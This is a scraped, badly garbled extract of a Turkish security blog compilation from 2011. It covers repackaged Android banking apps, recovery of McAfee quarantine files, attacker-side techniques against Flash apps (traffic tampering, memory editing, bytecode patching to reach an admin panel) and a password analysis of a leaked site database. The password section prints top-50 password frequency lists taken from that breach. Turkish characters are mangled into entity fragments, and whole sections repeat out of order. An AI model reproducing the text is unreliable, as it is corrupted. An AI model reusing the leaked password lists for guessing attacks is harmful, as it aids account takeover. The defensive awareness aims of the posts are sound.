Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 34: Hack 4 Career - 2011

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 35: Hack 4 Career - 2011

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan 